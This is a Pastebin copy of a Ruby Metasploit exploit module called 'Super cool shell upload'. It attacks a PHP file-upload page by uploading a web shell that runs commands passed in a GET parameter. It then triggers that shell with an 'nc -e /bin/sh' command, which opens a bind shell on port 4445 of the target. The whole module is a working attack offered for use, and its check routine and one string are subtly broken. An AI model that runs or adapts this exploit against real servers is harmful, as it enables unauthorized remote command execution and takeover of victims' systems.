SHARE
TWEET

super cool msf module

a guest Dec 30th, 2014 212 Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1.  
  2. ##
  3. # This module requires Metasploit: http//metasploit.com/download
  4. # Current source: https://github.com/rapid7/metasploit-framework
  5. ##
  6.  
  7. require 'msf/core'
  8.  
  9. class Metasploit3 < Msf::Exploit::Remote
  10.   Rank = ExcellentRanking
  11.  
  12.   include Msf::HTTP::Wordpress
  13.   include Msf::Exploit::FileDropper
  14.  
  15.   def initialize(info = {})
  16.     super(update_info(info,
  17.       'Name'           => 'Super cool shell upload',
  18.       'Description'    => %q{
  19.                 This is super cool module for Metasploit to check if you can upload shell on target.
  20.       },
  21.       'Author'         =>
  22.         [
  23.           'HauntIT Blog'     # metasploit module
  24.         ],
  25.       'License'        => MSF_LICENSE,
  26.       'References'     =>
  27.         [
  28.           [ 'URL', 'http://HauntIT.blogspot.com']
  29.         ],
  30.       'Privileged'     => false,
  31.       'Platform'       => ['php'],
  32.       'Arch'           => ARCH_PHP,
  33.       'Targets'        => [ ['Any vulnerable upload ', {}] ],
  34.       'DefaultTarget'  => 0,
  35.       'DisclosureDate' => '28/12/2014'))
  36.   end
  37.  
  38.  
  39.   def check
  40.     readurl = normalize_uri(target_uri.path, 'upload','upload.php')
  41.     res = send_request_cgi({
  42.       'uri'    => readurl,
  43.       'method' => 'GET'
  44.     })
  45.  
  46.     if res.code != 200
  47.       return Msf::Exploit::CheckCode::Unknown
  48.     end
  49.  
  50.     return Msf::Exploit::CheckCode::Safe
  51.   end
  52.  
  53.   def exploit
  54.     payload_name = "#{rand_text_alpha(10)}.php"
  55.  
  56.     shell = "<?php echo '<pre>';$c=$_GET['c'];shell_exec($c);?>"
  57.  
  58.     uri = normalize_uri(target_uri.path, 'upload','upload.php')
  59.  
  60.     data = Rex::MIME::Message.new
  61.     data.add_part(shell, 'application/octet-stream', 'binary', "form-data; name=\"plik\"; filename=\"#{payload_name}\"")
  62.  
  63.  
  64.     post_data = data.to_s
  65.  
  66.     payload_uri = normalize_uri(target_uri.path, 'upload','foto', payload_name)
  67.  
  68.     print_status("#{peer} - Uploading payload to #{payload_uri}")
  69.     res = send_request_cgi({
  70.       'method'   => 'POST',
  71.       'uri'      => uri,
  72.       'ctype'    => "multipart/form-data; boundary=#{data.bound}",
  73.       'vars_post' => { 'plik' => '#{payload_name}' },
  74.       'data'     => post_data
  75.     })
  76.  
  77.     if res.code != 200 || res.body =~ /Blad/
  78.       fail_with(Failure::UnexpectedReply, "#{peer} - Upload failed")
  79.     else
  80.       print_status("Got shell ;>")
  81.     end
  82.  
  83.     print_status("#{peer} - Executing payload #{payload_uri}")
  84.     res = send_request_cgi({
  85.       'uri'    => payload_uri,
  86.       'method' => 'GET',
  87.       'vars_get' => {'c' => 'id;nc -lvvp 4445 -e /bin/sh &'}
  88.     })
  89.  
  90.  
  91.   end
  92. end
RAW Paste Data
Want to get better at Ruby?
Learn to code Ruby in 2017
Top